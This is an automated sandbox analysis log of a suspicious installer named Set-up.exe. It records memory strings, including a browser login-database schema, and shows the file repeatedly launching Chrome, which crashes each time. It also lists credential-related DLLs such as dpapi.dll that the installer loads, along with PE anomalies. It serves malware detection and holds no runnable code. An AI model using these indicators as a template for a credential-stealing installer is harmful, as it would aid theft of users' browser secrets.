            Source: Set-up.exe, 00000000.00000002.1544669791.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1417968546.0000000003B25000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1544669791.00000000042ED000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1544669791.00000000042D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1409641222.00000243933EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Set-up.exeString found in binary or memory: 250-STARTTLS
            Source: Set-up.exeString found in binary or memory: <html><head><META http-equiv=Content-Type content="text/html; charset=utf-8"></head><body><!--StartFragment-->
            Source: Set-up.exeString found in binary or memory: n<html><head><META http-equiv=Content-Type content="text/html; charset=utf-8"></head><body><!--StartFragment-->
            Source: Set-up.exeString found in binary or memory: NATS-SEFI-ADD
            Source: Set-up.exeString found in binary or memory: NATS-DANO-ADD
            Source: Set-up.exeString found in binary or memory: JIS_C6229-1984-b-add
            Source: Set-up.exeString found in binary or memory: jp-ocr-b-add
            Source: Set-up.exeString found in binary or memory: JIS_C6229-1984-hand-add
            Source: Set-up.exeString found in binary or memory: jp-ocr-hand-add
            Source: Set-up.exeString found in binary or memory: ISO_6937-2-add
            Source: unknownProcess created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
            Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
            Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7260 -s 144
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7260 -s 92
            Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3888 -s 144
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3888 -s 92
            Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1692 -s 140
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1692 -s 92
            Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeSection loaded: activeds.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeSection loaded: adsldpc.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
            Source: Set-up.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: Set-up.exeStatic file information: File size 25181696 > 1048576
            Source: Set-up.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x102e800
            Source: Set-up.exeStatic PE information: Raw size of .reloc is bigger than: 0x100000 < 0x18ca00
            Source: Set-up.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x5e3200
            Source: Set-up.exeStatic PE information: More than 200 imports for user32.dll
            Source: Set-up.exeStatic PE information: More than 200 imports for kernel32.dll
            Source: Set-up.exeStatic PE information: section name: .didata
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
